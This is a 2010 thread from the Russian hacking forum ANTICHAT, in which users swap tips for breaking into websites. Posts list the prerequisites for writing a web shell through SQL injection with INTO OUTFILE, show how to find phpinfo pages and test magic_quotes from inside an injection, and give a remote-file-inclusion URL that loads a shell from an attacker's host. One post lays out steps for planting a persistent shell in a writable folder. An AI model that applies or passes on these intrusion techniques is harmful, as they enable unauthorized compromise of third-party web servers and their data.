ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.08.2010, 19:48
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
bafoed, Довольно не часто эти права имеются. Так же нужно найти пути сайта если они есть.
|
|
|
21.08.2010, 21:18
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Redwood, Бывают скули когда magic_quotes включен, а шелл залить реально !
|
|
|
|
21.08.2010, 22:41
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от bafoed
bafoed said:
нету прав на запись =(
Для залития шелла через into outfile, тебе обязательно нужны привилегии File, magic_quotes = off (в некоторых случаях можно залиться и при magic_quotes = on), абсолютный путь до папки доступной на запись.
|
|
|
|
22.08.2010, 00:30
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 8
Провел на форуме:
41003
Репутация:
0
|
|
Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?
|
|
|
|
22.08.2010, 07:46
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094
Репутация:
0
|
|
iget , phpinfo() smotri..
/phpinfo
/phpinfo.php
/info.php
|
|
|
|
22.08.2010, 11:56
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Сообщение от iget
iget said:
Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?
Обычно на сервере не хранят такую информацию (phpinfo()), например в файлах указанных нижу. Но если админ нуб, это реально. При открытии phpinfo() увидишь, то что тебе нужно. Magic_quotes включен/выключен можно узнать прямо в скуле. Достаточно узнать колонки любой таблицы, например "where+table_name= 'users '" и, если тебе вывелись колонки users, то magic_quotes выключен.
|
|
|
|
22.08.2010, 18:02
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648
Репутация:
0
|
|
Здравствуйте!Я уже писал ранее:
Подскажите, пожалуйста!Cитуация:
Имеется инклудовый сайт, захожу на него шеллом так-
site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
Пробовал и r57shell 1.24 и другие, одинаково.
Может быть сможете что-нибудь посоветовать.
Windows NT VIA-008 5.2 build 3790
Microsoft-IIS/6.0
Сейчас обнаружил, что могу выполнять некоторые php сценарии, кроме создания и скачивания файлов. Подскажите, пожалуйста, возможно у кого-то есть, какие-либо идеи на сей счет. Заранее большое спасибо.
|
|
|
|
22.08.2010, 18:06
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094
Репутация:
0
|
|
poprobuy asp shell
|
|
|
|
22.08.2010, 18:29
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648
Репутация:
0
|
|
попробовал.к сожалению asp шеллы дают тот же результат, создание и скачивание файлов не удается выполнить((((
|
|
|
|
22.08.2010, 18:33
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2against
Попробуй сделать так:
1) Ищешь на сайте папку, доступную для записи.
2) Пишешь в http://myevilsite.narod.ru/123.php такую прелесть:
3) site.ru/index.php?page=http://myevilsite.narod.ru/123.php
4) site.ru/папка/доступная/на/запись/321.php
Тут должен находиться полноценный шелл. |
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
